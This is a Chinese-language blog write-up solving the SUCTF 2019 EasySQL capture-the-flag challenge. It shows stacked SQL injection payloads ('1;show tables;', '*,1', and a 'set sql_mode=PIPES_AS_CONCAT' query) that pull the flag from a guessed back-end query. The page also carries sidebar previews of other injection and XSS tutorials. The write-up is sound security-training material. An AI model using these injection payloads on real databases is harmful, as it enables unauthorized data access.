[SUCTF 2019]EasySQL1 write up

最新推荐文章于 2021-12-23 01:46:22 发布
最新推荐文章于 2021-12-23 01:46:22 发布
阅读量167 收藏
点赞数 1
分类专栏: CTF 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45766049/article/details/117410120
版权

[SUCTF 2019]EasySQL1 write up

本题所需知识点:堆叠注入

点开题目,题目只有一个输入框,发现是POST参数提交。

在这里插入图片描述

输入任意数字,

在这里插入图片描述

输入任意字符串,无反应或如下图

在这里插入图片描述

接下来尝试构造闭合,均无反应

'
1'
1' or 1=1#

尝试堆叠注入,成功

1;show databases;
1;show tables;

在这里插入图片描述
在这里插入图片描述

在进一步的测试中,无效果。

1;select * from Flag;

同时尝试大小写,char字符拼接等方法绕过,无效果。

无耐,看大神的题解。https://blog.csdn.net/qq_43678005/article/details/108101904

原来是要猜测查询的语句。

select $_GET['query'] || flag from flag

另说是比赛时源码泄露了,index.php.swp,但是本环境查看不了。

方法一:

构造payload

*,1
-------------------------
select *,1||flag from flag
<==>select *,1 from flag

在这里插入图片描述

方法二:

将“||”变成字符串连接符,而不是或

涉及到mysql中sql_mode参数设置,设置 sql_mode=pipes_as_concat字符就可以设置。

在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。

但在mysql 缺省不支持。需要调整mysql 的sql_mode

模式:pipes_as_concat 来实现oracle 的一些功能。

构造payload

1;set sql_mode=PIPES_AS_CONCAT;select 1

最后获得flag

在这里插入图片描述

想当探险家的提莫
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LCD_YeJing.zip_1_Write On_wave3ak
09-23
Based on the VHDL LCD code, you can download it yourself if you need it. If the file cannot be opened, please write to me!
[SUCTF 2019]EasySQL 1
Huamang的博客
01-31 703
堆叠注入 尝试万能密码没用后尝试堆叠注入,就是语句用;隔开 返回了所有的库 返回了当前库的表 查看表Flag的定义的时候失败了 select 1 from table 这个题目涉及到一个操作select 1 from table select 1 from table增加临时列,每行的列值是写在select后的数,这条sql语句中是1 1是一常量(可以为任意数值) 一般是作条件查询用的 一般用来当做判断子查询是否成功(即是否有满足条件的时候使用) 看了大佬的wp,他们猜出语句大概是这样 select
[SUCTF 2019]EasySQL1
underline0的博客
12-23 873
1.老规矩,先输入1 2.输入1 or 1,页面提示nonono,说明or已被列入黑名单,通过我们尝试,and,union等等都被列入黑名单。 3.我们来判断参数是否被引号,双引号,括号包裹。 输入1' → 页面回显不正常 输入1'#企图注释掉后面的引号 → 依旧不正常 这说明什么,说明了我们#号后面注释掉了一些东西,使sql语句出了问题,因此就不能够使用注释了(同时我们便可以大胆猜测,这边应该没有包裹,因为既然后面还有重要的语句,源码中的sql语句就不会是简...
java版sm4源码-SCTF2019-Write-Up:SCTF2019报道
06-04
Write-Up Misc 签到 出题人: XXX 解题人数: 260 最终分数:71 [removed]/9j/4QBkRXhpZgAATU0AKgAAAAgABYdp... 给了个图片的base64编码,某些浏览器可能渲染会截断,本来想放hint提示浏览器问题,但是直接被秒了就没...
PICOCTF_2019:picoCTF2019解决方案
02-18
PICOCTF_2019 picoCTF2019解决方案
2019强网杯write up(难度较大)-b64_c3VuJTIwYm95-it720.doc
11-29
CTF安全大赛必刷题
write great code 1
12-04
write great code 1,if you use this way you can write a good code
BUUCTF - [SUCTF 2019]EasySQL1
Naptmn的博客
02-28 304
输入1 输入1’没有反应 试一下联合查询,先看回显 被过滤了 所以尝试堆叠查询 然后上网查,,,居然是要推测出后端的代码 sql = "select".sql="select".sql="select".post[‘query’]."||flag from Flag"; 在注入前有一个知识点就是select 1 from table到底查了点什么 到Navicat中试一下,我的表名叫user,里面没有字段1,共有11行记录 可以看到这句话的意思是在原有的表中临时增加一列,里面的内容全部都是1,.
Metasploit技术
Teemos的博客
09-17 1621
1 metasploit介绍 metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模块化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。 metasploit可向后端模块提供多种用来控制测试的接口(如控制台、web、CLI)。通过控制台接口,还可以访问和使用所有metasploit的插件,例如payload、利用模块、post模块等。此外,metasploit还有第三方程序的接口,如nmap和sqlmap
web安全之暴力破解(一)
Teemos的博客
12-24 1222
文章目录1 暴力破解原理和测试流程1.1 测试流程1.2 字典优化技巧2 基于表单的暴力破解3 验证码绕过-on client相关问题3.1 认证流程3.2 常见问题4 验证码绕过服务端5 防暴力破解的措施总结 1 暴力破解原理和测试流程 连续性变化+字典+自动化 一个有效的字典,可以大大提高暴力破解的效率。 常用的账号密码(弱口令) 互联网上被脱裤后账号密码(社工库) 使用指定的字符使用工具按照指定的规则进行排列组合算法生成的密码 1.1 测试流程 1.确认登录接口的脆弱性 确认目标是否存
SSTI模版注入
Teemos的博客
06-02 1206
SSTI模版注入 文章目录SSTI模版注入1 SSTI服务器端模板注入2 模板引擎3 举例3.1 以python的flask为例4 绕过tips4.1 过滤[]等括号4.2 过滤了subclasses4.3 过滤class5 总结 1 SSTI服务器端模板注入 SSTI服务器端模板注入(Server-Side Template Injection),同SQL注入、XSS注入等,都是从用户获取一个输入,由于代码不规范或信任了用户输入,后端的渲染处理上进行了语句的拼接,而导致了服务端模板注入。 SSTI利用的是
渗透之信息收集
Teemos的博客
02-25 551
在信息收集中,最主要的就是收集服务器的配置信息和网站的敏感信息,其中包括域名及子域名信息、目标网站系统、CMS指纹、目标网站真实IP、开放的端口等。 只要与目标网站有关,都应尽量收集。 文章目录1 收集域名信息1.1 Whois查询1.2 备案信息查询2 收集敏感信息3 收集子域名信息3.1 子域名检测工具3.2 搜索引擎枚举3.3 在线查询4 收集常用端口信息4.1 文件共享服务端口4.2 远程连接服务4.3 Web应用服务端口4.4 数据库服务端口4.5 邮件服务端口4.6 网络常见协议端口4.7 特殊
[总结]XSS基础
Teemos的博客
12-27 492
[总结]XSS基础 文章目录[总结]XSS基础1 XSS分类1.1 反射型XSS1.2 存储型XSS1.3 DOM型XSS2 XSS危害2.1 cookie介绍2.2 盗取用户信息2.3 篡改网页链接3 XSS存在位置3.1 探测XSS3.2 可能存在的位置4 绕过简单保护机制4.1 相关编码介绍4.1.1 URL编码4.1.2 html编码4.1.3 JavaScript编码4.2 双写绕过4.3 编码绕过4.4 js伪协议绕过4.5 CSS特性绕过4.6 HTML5特性绕过4.7 其他姿势5 防范措施5
[护网杯 2018]easy_tornado1 write up
Teemos的博客
05-31 389
[护网杯 2018]easy_tornado1 write up 本题所需知识点:SSTI、文件包含 1 题解 点开题目,发现有3个链接 分别点开三个链接 file?filename=/flag.txt&filehash=5cb650c67b3f3eb1c3382db985cba60d file?/filename=/welcome.txt&filehash=453823f83be22fbffa0f5ba9f7e7e8ba file?filename=/hints.txt&fi
[总结]SQL注入基础
Teemos的博客
09-27 325
[总结]SQL注入基础 文章目录[总结]SQL注入基础注入原理与相关知识注入漏洞产生原因相关知识常用函数常用命令常用注入语句SQL注入流程判断注入点判断注入类型判断数据库类型获取所需信息,提权GET注入POST注入打靶盲注基于布尔的盲注基于时间的盲注打靶:HTTP头的注入HTTP头介绍cookies注入:base64打靶宽字节注入打靶二次注入危害打靶报错注入Duplicate entry报错Xpath报错整型溢出报错读写文件读文件写文件打靶绕过简单的保护机制绕过去除注释符的SQL注入绕过去除空格的SQL注入
[总结]文件上传漏洞基础
Teemos的博客
12-24 278
文章目录1 常见的文件上传漏洞类型2 绕过JS检查3 绕过黑名单验证3.1 BP枚举可解析后缀3.2 .htaccess3.2.1 .htaccess文件介绍3.2.2 配置http.conf3.2.3 审计黑名单过滤代码3.3 大小写绕过3.4 .号绕过3.5 特殊符号绕过3.6 路径拼接绕过3.7 双写绕过4 绕过白名单验证4.1 绕过MIME-Type验证4.1.1 MiME-Type介绍4.1.2 验证MIME-Type代码分析4.1.3 BP绕过验证4.2 00截断绕过4.2.1 GET型00截断
instantdoctrl1.write daq数据采集
最新发布
08-02
instantdoctrl1.write daq数据采集是指通过使用instantdoctrl1对象的write方法来进行数据采集操作。DAQ是Data Acquisition的缩写,指的是数据采集系统。数据采集是指通过传感器、电子设备等将模拟信号转换为数字信号...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值